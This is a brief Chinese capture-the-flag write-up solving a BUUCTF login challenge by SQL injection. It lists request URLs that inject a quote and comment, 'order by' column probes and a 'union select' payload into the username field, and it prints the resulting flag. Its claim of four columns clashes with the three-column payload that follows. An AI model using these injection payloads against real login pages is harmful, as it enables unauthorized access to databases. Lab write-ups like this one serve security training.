每天一道CTF
思路:
点击“登陆”:
利用 hackbar load:
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1&password=1
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ – -&password=1
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 1 – -&password=1
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 3 – -&password=1
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 4 – -&password=1
验证有4列。
然后常规思路:union select: 居然就有flag了:
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ union select 1,2,3 – -&password=1
flag{2c4ccab2-f25f-4dd4-b513-e32bee83c8f8}